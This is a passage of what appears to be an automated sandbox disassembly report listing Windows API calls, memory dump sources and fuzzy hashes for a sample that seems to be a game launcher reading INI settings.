1155->1157 1156->1151 1159 100080b2-100080b7 1156->1159 1157->1137 1158 10008045-10008048 1157->1158 1158->1139 1159->1151 1160 100080bf-100080c1 1159->1160 1160->1155
                                  APIs
                                    • Part of subcall function 10007E17: SetFilePointer.KERNEL32(FA83E855,00000000,00000000,00000002,10007FCD,?,00000000,?,?,?,10008124,?,00000140,00000000,00000000), ref: 10007E43
                                  • SetFilePointer.KERNEL32(FA83E855,00000000,00000000,00000001,?,00000000,?,?,?,10008124,?,00000140,00000000,00000000), ref: 10007FEE
                                  • _malloc.LIBCMT ref: 1000801E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609581253.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10001000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: FilePointer$_malloc
                                  • String ID:
                                  • API String ID: 3040784002-0
                                  • Opcode ID: b201b2cbd970e2b698aa026e71b7937ac5f18c2142fedf9cda4a911ccf216a12
                                  • Instruction ID: e9e65de8990a35600aa63ecf93a5fe2b6943994b54ace195112ba4e3cbd13dc3
                                  • Opcode Fuzzy Hash: b201b2cbd970e2b698aa026e71b7937ac5f18c2142fedf9cda4a911ccf216a12
                                  • Instruction Fuzzy Hash: BC41E170E0024AAFFB50DAA4C845B5EBBF1FF043D4F11816AEA54E7289E7759F488B40

                                  Control-flow Graph

                                  APIs
                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 10002E8B
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 10002E96
                                    • Part of subcall function 1000AA9E: _malloc.LIBCMT ref: 1000BD22
                                  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 10002EB1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609581253.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10001000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: File$CreateReadSize_malloc
                                  • String ID:
                                  • API String ID: 1520594064-0
                                  • Opcode ID: a95b2213d73165cd3d6775a3d50b751076bb32b1058e07c2771ba57d7c97f6cb
                                  • Instruction ID: 68624f3e933efa91eaa5f7396baae24bc5eaf6790c19fd373594060868047bb5
                                  • Opcode Fuzzy Hash: a95b2213d73165cd3d6775a3d50b751076bb32b1058e07c2771ba57d7c97f6cb
                                  • Instruction Fuzzy Hash: 4E1156756001287AFB11AF61DCC9EEB3F6CEF466E0F008125F909A6156DA70AE45C7F0
                                  APIs
                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000141,00000141,?,10008B63,?,?), ref: 10007D8C
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,00000140,?,1000965A,?,00000004,1000A0D1,?,?,00000334,1000439D,?), ref: 10007DB0
                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000020,?,1000965A,?,00000004,1000A0D1,?,?,00000334,1000439D,?), ref: 10007DE5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609581253.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10001000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: File$Pointer$Create
                                  • String ID:
                                  • API String ID: 250661774-0
                                  • Opcode ID: 728afc4fb06e335d4fafcc7d92433849b5f48e6cfbb3e06e1ad6d3530bb74562
                                  • Instruction ID: 4f656ac9fc5f2f06108f91d7ec9c633ab968d44dc8153898d38ee8b8eb82a3a9
                                  • Opcode Fuzzy Hash: 728afc4fb06e335d4fafcc7d92433849b5f48e6cfbb3e06e1ad6d3530bb74562
                                  • Instruction Fuzzy Hash: 0611C671504348BEE7118F688C80B9ABBECEF053A4F10895DF595A72C1D2B1AD448B20
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609581253.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10001000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: _memset
                                  • String ID:
                                  • API String ID: 2102423945-0
                                  • Opcode ID: 7213c61829fe7ab4cc5639b422b216faffa918b448852484d9944ef95b569b9c
                                  • Instruction ID: 3476ce63d3aaa573aec64c0bffa9ef49cde6163629ebf3a1eccc858e77ab2209
                                  • Opcode Fuzzy Hash: 7213c61829fe7ab4cc5639b422b216faffa918b448852484d9944ef95b569b9c
                                  • Instruction Fuzzy Hash: 1D416F75D0021B9BEB10DF64CC81A9DBBB5FF403E4F214569E468A719ADB30AB858F90
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: _memmove_s
                                  • String ID:
                                  • API String ID: 800865076-0
                                  • Opcode ID: 3095cf917f2350286aade5e2211f468d19bdb81fb379ed52de83f2cf1c14f51f
                                  • Instruction ID: f6c7b27f8eaff605af0a22a58acb08d8d1cbec46cf9e307574cfe919ceb240e6
                                  • Opcode Fuzzy Hash: 3095cf917f2350286aade5e2211f468d19bdb81fb379ed52de83f2cf1c14f51f
                                  • Instruction Fuzzy Hash: 0121C331600504EFCB00DF5AC889C6EF7A9EF94324B10896EFC046B390DA35AD20DB99
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609581253.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10001000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 736c95ca4fd3135a2edcbb07283ab68ac9dc71f1ba12f3538e4f7f7cb6d74957
                                  • Instruction ID: b89cec954c075b730a56da69cb46cafd068f6b8bae9ad87e748e45a88384cad6
                                  • Opcode Fuzzy Hash: 736c95ca4fd3135a2edcbb07283ab68ac9dc71f1ba12f3538e4f7f7cb6d74957
                                  • Instruction Fuzzy Hash: D5018B31604B12EFF721CF18D88085AB7E8FB862E07300A1BE4E5E3989D770AE418B51
                                  APIs
                                  • ___crtCorExitProcess.LIBCMT ref: 1000BA5F
                                    • Part of subcall function 1000BA2C: GetModuleHandleW.KERNEL32(100185B8,?,1000BA64,00000000,?,1000B4FA,000000FF,0000001E,00000001,00000000,00000000,?,10010014,00000000,00000001,00000000), ref: 1000BA36
                                    • Part of subcall function 1000BA2C: GetProcAddress.KERNEL32(00000000,100185A8), ref: 1000BA46
                                  • ExitProcess.KERNEL32 ref: 1000BA68
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609581253.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10001000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: ExitProcess$AddressHandleModuleProc___crt
                                  • String ID:
                                  • API String ID: 2427264223-0
                                  • Opcode ID: abc46e778dca3db5ce812f73b672184a6f01df30641a4562d6bbc8916ecbfb88
                                  • Instruction ID: 9e8f86a35322aa789f4e0151c64d6b54dfcfdd38f63c23601c9c439c46ba9861
                                  • Opcode Fuzzy Hash: abc46e778dca3db5ce812f73b672184a6f01df30641a4562d6bbc8916ecbfb88
                                  • Instruction Fuzzy Hash: 59B09B311001087BDB015F15CC4D85D3F1ADB812A07104010F40405131DF71EE52D681
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: _memcpy_s
                                  • String ID:
                                  • API String ID: 2001391462-0
                                  • Opcode ID: 445250c8ed87e1bebe8596cf02b04436651d17126fa6f344ecf8848ff3af567b
                                  • Instruction ID: be568734a41f28fb349ccf2bf21350fb7fb647c90ab0f50d062a53d9c7b53683
                                  • Opcode Fuzzy Hash: 445250c8ed87e1bebe8596cf02b04436651d17126fa6f344ecf8848ff3af567b
                                  • Instruction Fuzzy Hash: 4C116D76600604AFC318CFA9C881C6AB3A9FF893107148AAEF5598B351EB31ED00CBD4
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 1000FCBF
                                    • Part of subcall function 1000DDF3: __getptd_noexit.LIBCMT ref: 1000DDF3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609581253.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10001000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: AllocateHeap__getptd_noexit
                                  • String ID:
                                  • API String ID: 328603210-0
                                  • Opcode ID: a67366d662c5bd092a589687f11339a4dae3e25b87bc1b37a2dbb48db3d3f10c
                                  • Instruction ID: 636ff11a492ce15cdcdc60a6e11a12ef751a60b812adc93f976add26828ff1dc
                                  • Opcode Fuzzy Hash: a67366d662c5bd092a589687f11339a4dae3e25b87bc1b37a2dbb48db3d3f10c
                                  • Instruction Fuzzy Hash: 2301F13520026E9BFB14CF25CE56FBA3399EB803E4F12412DEC16CA998C730EC01E680
                                  APIs
                                  • GetCurrentDirectoryA.KERNEL32(00000103,00000140,000000FE,?,1000965A,?,00000004,1000A0D1,?,?,00000334,1000439D,?), ref: 10008B2A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609581253.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10001000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: CurrentDirectory
                                  • String ID:
                                  • API String ID: 1611563598-0
                                  • Opcode ID: c4b11cf663dedc9a4aa197a2d062e931ecfd140e47d02db53880576ec9a3b569
                                  • Instruction ID: 05fb876ac0a7ffa909206c90f41a6c21d31a4450f3bef0f042e6b82b858db211
                                  • Opcode Fuzzy Hash: c4b11cf663dedc9a4aa197a2d062e931ecfd140e47d02db53880576ec9a3b569
                                  • Instruction Fuzzy Hash: 6301B1B6100A468EF321CE24C815BD63BE9FB003E0F244129E5D58B195EB34D748C714
                                  APIs
                                  • SetFilePointer.KERNEL32(FA83E855,00000000,00000000,00000002,10007FCD,?,00000000,?,?,?,10008124,?,00000140,00000000,00000000), ref: 10007E43
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609581253.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10001000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: FilePointer
                                  • String ID:
                                  • API String ID: 973152223-0
                                  • Opcode ID: 8be2a931f1bb5c1e663c23c7387cc1016260f232cf004776458d173a503434cf
                                  • Instruction ID: a59443ee6d1aeaa2d9ed199805bd91a064a26d0d23d6a45f21f6b6edd1a505ad
                                  • Opcode Fuzzy Hash: 8be2a931f1bb5c1e663c23c7387cc1016260f232cf004776458d173a503434cf
                                  • Instruction Fuzzy Hash: 11F0D1B1C1B1D29EFB6CCB04C818D5A7687FB9C2D4B1680EAE40C5B029D6148D40EA94
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 0054DC62
                                    • Part of subcall function 005381C8: __CxxThrowException@8.LIBCMT ref: 005381DE
                                    • Part of subcall function 005381C8: __EH_prolog3.LIBCMT ref: 005381EB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: H_prolog3$Exception@8Throw
                                  • String ID:
                                  • API String ID: 2489616738-0
                                  • Opcode ID: 14618eda43c9671e68b8fd08d8422abacf40353be5bf252deb74d13aaf15f6c9
                                  • Instruction ID: d695574f4330ccb503b9121505bbc1850e9446592826f94646e43469e9bdd42a
                                  • Opcode Fuzzy Hash: 14618eda43c9671e68b8fd08d8422abacf40353be5bf252deb74d13aaf15f6c9
                                  • Instruction Fuzzy Hash: 85015E706012039BDB24AF34C85A3AA7AB2BBC1355F10812CA4818B290EF758D40CB65
                                  APIs
                                  • ReadFile.KERNEL32(FA83E855,?,00000001,00000001,00000000,?,?,1000808D,?,00000404,00000001,00000000,?,00000000), ref: 10007E93
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609581253.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10001000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: FileRead
                                  • String ID:
                                  • API String ID: 2738559852-0
                                  • Opcode ID: e7d503647b2602c65f330093808bd1a8c877245a2ba7fd444c54634443dd94a4
                                  • Instruction ID: 60dde942ee128e8b5e26815de62b9c1eeda109e52923c3b51a2d140b3793f235
                                  • Opcode Fuzzy Hash: e7d503647b2602c65f330093808bd1a8c877245a2ba7fd444c54634443dd94a4
                                  • Instruction Fuzzy Hash: 6001AD72A00249AFE720CE19CC40A8ABBFAFB94380F148429F849C6650D330FD558B50
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 10009623
                                    • Part of subcall function 1000BD08: _malloc.LIBCMT ref: 1000BD22
                                    • Part of subcall function 1000BD08: std::exception::exception.LIBCMT ref: 1000BD57
                                    • Part of subcall function 1000BD08: std::exception::exception.LIBCMT ref: 1000BD71
                                    • Part of subcall function 1000BD08: __CxxThrowException@8.LIBCMT ref: 1000BD82
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609581253.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10001000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: std::exception::exception$Exception@8H_prolog3Throw_malloc
                                  • String ID:
                                  • API String ID: 2311266369-0
                                  • Opcode ID: 798ab431fcf6c30b07a15d25c3bea45351add4a6768e397aed1a5e0b6ce581e3
                                  • Instruction ID: 27f0851c2b2a3c9f21f6ca51572d52810aa293ac0cd731c366aa61cf9dad0c11
                                  • Opcode Fuzzy Hash: 798ab431fcf6c30b07a15d25c3bea45351add4a6768e397aed1a5e0b6ce581e3
                                  • Instruction Fuzzy Hash: 84F0BB759156219BFB11DFA0980275D79A0FF00BE0F528201FC945F2D9DF76DE409794
                                  APIs
                                  • FindResourceW.KERNEL32(?,?,00000006), ref: 0040DE18
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: FindResource
                                  • String ID:
                                  • API String ID: 1635176832-0
                                  • Opcode ID: fb2d69a0bd7a020fb47280c1843f21d7131e2cb85a0d31c312364452428a4122
                                  • Instruction ID: f5cd0bbd57078f271fb784681db4e8cb7893742734e3648512ee1e3932500a40
                                  • Opcode Fuzzy Hash: fb2d69a0bd7a020fb47280c1843f21d7131e2cb85a0d31c312364452428a4122
                                  • Instruction Fuzzy Hash: 78E08C3670002837D6101A8ABC019BBB76CCAC2ABAB00403BF949EA240E675A81652F1
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609581253.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10001000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: __flsbuf
                                  • String ID:
                                  • API String ID: 2056685748-0
                                  • Opcode ID: b2abbf9e15346c5a683e1eb0b284856c540cceb5b9561b4a404859deff5ecdc1
                                  • Instruction ID: cd085754fea585c1a0c37b1266a5e6987fea52fd14f6493696e28795b49d8eb2
                                  • Opcode Fuzzy Hash: b2abbf9e15346c5a683e1eb0b284856c540cceb5b9561b4a404859deff5ecdc1
                                  • Instruction Fuzzy Hash: A3E09A3000034A8AEB108B20D001A367BA6DF01AA9F3086EEE585880EBC73A8447DA11
                                  APIs
                                  • _malloc.LIBCMT ref: 1000BD22
                                    • Part of subcall function 1000B4CB: __FF_MSGBANNER.LIBCMT ref: 1000B4E4
                                    • Part of subcall function 1000B4CB: __NMSG_WRITE.LIBCMT ref: 1000B4EB
                                    • Part of subcall function 1000B4CB: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 1000B510
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609581253.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10001000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: AllocateHeap_malloc
                                  • String ID:
                                  • API String ID: 501242067-0
                                  • Opcode ID: 2048147662bf453ba28ede84f0b6aa2d186b29f79e00af96329dcc402269dd3d
                                  • Instruction ID: a6a3255abbbc7b23de097487aa0110c8e60a8e847636431691c925b7fdd1c164
                                  • Opcode Fuzzy Hash: 2048147662bf453ba28ede84f0b6aa2d186b29f79e00af96329dcc402269dd3d
                                  • Instruction Fuzzy Hash: E5C01225104A0D727660BD6E580A92ABE8DCBC15E4E750452ED145618BFD52E812A1D1
                                  APIs
                                  • _doexit.LIBCMT ref: 1000BCBB
                                    • Part of subcall function 1000BB6F: __lock.LIBCMT ref: 1000BB7D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609581253.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10001000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: __lock_doexit
                                  • String ID:
                                  • API String ID: 368792745-0
                                  • Opcode ID: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                                  • Instruction ID: 4fbdee38a6290eebd8f6056f661dc23ca866b053305f8b7d48e45ec78bfe802d
                                  • Opcode Fuzzy Hash: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                                  • Instruction Fuzzy Hash: FDB0923258020C73EA201946AC03F163B0987C0AA0E240020BA0C2D1A5AAA2B9618089
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609581253.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10001000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: _calloc
                                  • String ID:
                                  • API String ID: 1679841372-0
                                  • Opcode ID: 4155536734e8379bf1a0d9e46d5e55f6b57c4bb927480cacbb9fba63a04539cd
                                  • Instruction ID: 2cd9351d4dfc93e9d47943277064b3f92f2890c0e3242ea62fae913676b3161e
                                  • Opcode Fuzzy Hash: 4155536734e8379bf1a0d9e46d5e55f6b57c4bb927480cacbb9fba63a04539cd
                                  • Instruction Fuzzy Hash: 12B0923204C34CBBAF055E81FC0289A3BA9EB40170B20401AFA18040616E33B4205648
                                  APIs
                                  • DeleteObject.GDI32(00000000), ref: 0053A606
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: DeleteObject
                                  • String ID:
                                  • API String ID: 1531683806-0
                                  • Opcode ID: d001c22539f3a6c22b27cffa3d4342250f635b76db201f74bd7546d7a7e5189c
                                  • Instruction ID: e7ab8058f96d9e082f81e297ae5c7e94aa700416bc84cc35b96cdea81974e626
                                  • Opcode Fuzzy Hash: d001c22539f3a6c22b27cffa3d4342250f635b76db201f74bd7546d7a7e5189c
                                  • Instruction Fuzzy Hash: FCB09270802102AADF00AB708A0E3263E547B9130AF059894A08081005EAB980829A01
                                  APIs
                                  • _free.LIBCMT ref: 100078C9
                                    • Part of subcall function 1000B491: RtlFreeHeap.NTDLL(00000000,00000000,?,1000B064,?,?,1000101C), ref: 1000B4A7
                                    • Part of subcall function 1000B491: GetLastError.KERNEL32(?,?,1000B064,?,?,1000101C), ref: 1000B4B9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609581253.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10001000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: ErrorFreeHeapLast_free
                                  • String ID:
                                  • API String ID: 1353095263-0
                                  • Opcode ID: 9c7efb68590269b2fc63797ccf94f6312e3d7331e264a762345e77b913906a88
                                  • Instruction ID: 64862a2d9b442625a5b0b759a32f449ecd248fb1dd9277ac75d4e02be58b0dbe
                                  • Opcode Fuzzy Hash: 9c7efb68590269b2fc63797ccf94f6312e3d7331e264a762345e77b913906a88
                                  • Instruction Fuzzy Hash: 40A0223200C30C3BAF002E82FC0380A3B8CCB000B0B20C022F80C080232E33BA200088
                                  APIs
                                  • GetSystemMenu.USER32(?,00000000), ref: 004107F8
                                  • AppendMenuW.USER32(?,00000800,00000000,00000000), ref: 00410873
                                  • AppendMenuW.USER32(?,00000000,00000010,00000010), ref: 00410882
                                  • SendMessageW.USER32(?,00000080,00000001,?), ref: 004108C3
                                  • SendMessageW.USER32(?,00000080,00000000,?), ref: 004108D7
                                  • _memset.LIBCMT ref: 004108EF
                                  • _memset.LIBCMT ref: 0041090A
                                  • _memset.LIBCMT ref: 00410925
                                  • _memset.LIBCMT ref: 00410940
                                  • _memset.LIBCMT ref: 0041095B
                                  • _memset.LIBCMT ref: 00410976
                                  • _memset.LIBCMT ref: 004109C3
                                  • _memset.LIBCMT ref: 004109DE
                                  • _memset.LIBCMT ref: 004109F9
                                  • GetPrivateProfileStringW.KERNEL32(Default,Url,006FD638,?,00000200,?), ref: 00410A29
                                  • GetPrivateProfileStringW.KERNEL32(Default,006FD160,006FD638,?,00000200,?), ref: 00410A4D
                                  • GetPrivateProfileStringW.KERNEL32(Default,006FD174,006FD638,?,00000200,?), ref: 00410A71
                                  • GetPrivateProfileStringW.KERNEL32(Default,006FD178,006FD638,?,00000200,?), ref: 00410A95
                                  • GetPrivateProfileStringW.KERNEL32(Default,006FD17C,006FD638,?,00000200,?), ref: 00410AB9
                                  • GetPrivateProfileStringW.KERNEL32(Default,006FEA38,006FD638,?,00000200,?), ref: 00410ADD
                                  • GetPrivateProfileStringW.KERNEL32(Game,Client,006FD638,?,00000200,?), ref: 00410B01
                                  • GetPrivateProfileStringW.KERNEL32(Game,ParamFormat,HOST=%d PARAM1=%s,?,00000200,?), ref: 00410B25
                                  • GetPrivateProfileStringW.KERNEL32(AppendConfig,Append,006FD638,?,00000200,?), ref: 00410B49
                                  • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,00000000,?,?,?,?,?,?), ref: 00410C58
                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000001,?), ref: 00410C68
                                  • GetPrivateProfileStringW.KERNEL32(Default,Url,006FD638,?,00000200,?), ref: 00410C90
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: PrivateProfileString$_memset$Menu$AppendMessageSend$CloseCreateFileHandleSystem
                                  • String ID: --feihuo$Append$AppendConfig$Client$Default$Game$HOST=%d PARAM1=%s$LauncherShellExecuteGame$ParamFormat$SetLayeredWindowAttributes$Url$User32.DLL
                                  • API String ID: 3045574127-1323054628
                                  • Opcode ID: 93590102ca61661659adb8fba72ca27c59ca443194793713e0817189d5c73e16
                                  • Instruction ID: 4260995b1a6f5113922751a41fe8d6b2d855cf4499bde5764cabfc71aca86193
                                  • Opcode Fuzzy Hash: 93590102ca61661659adb8fba72ca27c59ca443194793713e0817189d5c73e16
                                  • Instruction Fuzzy Hash: 3F72D670A40209AFD714DB64CC46FEAB37ABF44314F048699F619A72D1DBB4AE84CF94
                                  APIs
